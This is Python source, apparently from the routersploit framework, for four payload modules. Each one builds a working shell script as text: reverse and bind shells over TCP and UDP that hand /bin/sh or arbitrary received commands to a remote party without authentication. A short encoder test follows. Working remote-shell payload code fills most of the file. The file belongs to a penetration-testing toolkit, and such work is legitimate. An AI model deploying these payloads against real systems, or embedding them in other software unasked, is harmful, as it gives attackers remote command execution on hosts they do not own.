class Payload(ReverseTCPPayloadMixin, GenericPayload):
    """Module that renders a Python reverse-TCP shell script as text.

    The script returned by generate() opens a TCP connection to
    lhost:lport, duplicates that socket onto descriptors 0, 1 and 2,
    and then runs ``/bin/sh -i``.
    """

    __info__ = {
        "name": "Python Reverse TCP",
        "description": "Creates interactive tcp reverse shell by using python.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON
    # Module option built around an Encoder instance, labelled "Encoder".
    encoder = OptString(Encoder(), "Encoder")

    def generate(self):
        """Return the script source with self.lhost and self.lport filled in.

        Nothing is executed here; the method only assembles a string.
        On a host where the script runs, the observable shape is a Python
        interpreter with a ``/bin/sh -i`` child whose stdin, stdout and
        stderr all refer to one outbound TCP socket.
        """
        connect_stmt = "s.connect(('{}',{}))\n".format(self.lhost, self.lport)
        pieces = (
            "import socket,subprocess,os\n",
            "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n",
            connect_stmt,
            "os.dup2(s.fileno(),0)\n",
            "os.dup2(s.fileno(),1)\n",
            "os.dup2(s.fileno(),2)\n",
            # Last statement carries no trailing newline, as in the original.
            "p=subprocess.call([\"/bin/sh\",\"-i\"])",
        )
        return "".join(pieces)
class Payload(BindTCPPayloadMixin, GenericPayload):
    """Module that renders a Python bind-TCP command loop as text.

    The script returned by generate() listens on every interface
    (0.0.0.0) at rport, accepts a single connection and then passes
    whatever it receives to ``os.popen3``. The emitted text contains no
    authentication step.
    """

    __info__ = {
        "name": "Python Bind TCP",
        "description": "Creates interactive tcp bind shell by using python.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON
    # Module option built around an Encoder instance, labelled "Encoder".
    encoder = OptString(Encoder(), "Encoder")

    def generate(self):
        """Return the script source with self.rport filled in.

        Nothing is executed here; the method only assembles a string.
        The loop flag ``x`` in the emitted script is never reassigned, so
        the receive loop has no normal exit. ``os.popen3`` exists only in
        Python 2, which limits the interpreters the script can run under.
        """
        bind_stmt = "so.bind(('0.0.0.0',{}))\n".format(self.rport)
        pieces = (
            "import socket,os\n",
            "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n",
            bind_stmt,
            "so.listen(1)\n",
            "so,addr=so.accept()\n",
            "x=False\n",
            "while not x:\n",
            "\tdata=so.recv(1024)\n",
            "\tstdin,stdout,stderr,=os.popen3(data)\n",
            "\tstdout_value=stdout.read()+stderr.read()\n",
            "\tso.send(stdout_value)\n",
        )
        return "".join(pieces)
class Payload(ReverseTCPPayloadMixin, GenericPayload):
    """Module that renders a Python reverse-UDP shell script as text.

    The script returned by generate() creates a SOCK_DGRAM socket,
    connects it to lhost:lport, duplicates it onto descriptors 0, 1 and
    2, and runs ``/bin/sh`` through ``pty.spawn``.

    NOTE(review): the base mixin is named for TCP while the emitted
    socket is UDP; presumably it is reused only for the lhost/lport
    options. Confirm against the mixin.
    """

    __info__ = {
        "name": "Python Reverse UDP",
        "description": "Creates interactive udp reverse shell by using python.",
        "authors": (
            "Andre Marques (zc00l)",  # shellpop
            "Marcin Bury <marcin[at]threat9.com>"  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON
    # Module option built around an Encoder instance, labelled "Encoder".
    encoder = OptString(Encoder(), "Encoder")

    def generate(self):
        """Return the script source with self.lhost and self.lport filled in.

        Nothing is executed here; the method only assembles a string.
        On a host where the script runs, the observable shape is a Python
        interpreter that redirects its standard descriptors to a UDP
        socket before starting ``/bin/sh`` on a pseudo-terminal.
        """
        connect_stmt = "s.connect(('{}',{}))\n".format(self.lhost, self.lport)
        pieces = (
            "import os\n",
            "import pty\n",
            "import socket\n",
            "s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n",
            connect_stmt,
            "os.dup2(s.fileno(), 0)\n",
            "os.dup2(s.fileno(), 1)\n",
            "os.dup2(s.fileno(), 2)\n",
            "pty.spawn('/bin/sh');\n",
            "s.close()\n",
        )
        return "".join(pieces)
class Payload(BindTCPPayloadMixin, GenericPayload):
    """Module that renders a Python bind-UDP command loop as text.

    The script returned by generate() binds a SOCK_DGRAM socket on every
    interface (0.0.0.0) at rport, hands each received datagram to
    ``Popen(..., shell=True)`` and sends the captured stdout and stderr
    back to the sender. The emitted text contains no authentication step.

    NOTE(review): the base mixin is named for TCP while the emitted
    socket is UDP; presumably it is reused only for the rport option.
    Confirm against the mixin.
    """

    __info__ = {
        "name": "Python Bind UDP",
        "description": "Creates interactive udp bind shell by using python.",
        "authors": (
            "Andre Marques (zc00l)",  # shellpop
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON
    # Module option built around an Encoder instance, labelled "Encoder".
    encoder = OptString(Encoder(), "Encoder")

    def generate(self):
        """Return the script source with self.rport filled in.

        Nothing is executed here; the method only assembles a string.
        On a host where the script runs, the observable shape is a Python
        process holding a UDP socket bound to all interfaces and spawning
        one shell child per datagram it receives.
        """
        bind_stmt = "s.bind(('0.0.0.0',{}))\n".format(self.rport)
        pieces = (
            "from subprocess import Popen,PIPE\n",
            "from socket import socket, AF_INET, SOCK_DGRAM\n",
            "s=socket(AF_INET,SOCK_DGRAM)\n",
            bind_stmt,
            "while 1:\n",
            "\tdata,addr=s.recvfrom(1024)\n",
            "\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n",
            "\ts.sendto(''.join([out[0],out[1]]),addr)\n",
        )
        return "".join(pieces)
def test_payload_enconding():
    """Test scenario - payload encoding.

    Encodes the ``bind_tcp`` fixture with a fresh Encoder and compares
    the result with the stored ``bind_tcp_encoded`` value.
    """
    produced = Encoder().encode(bind_tcp)
    assert produced == bind_tcp_encoded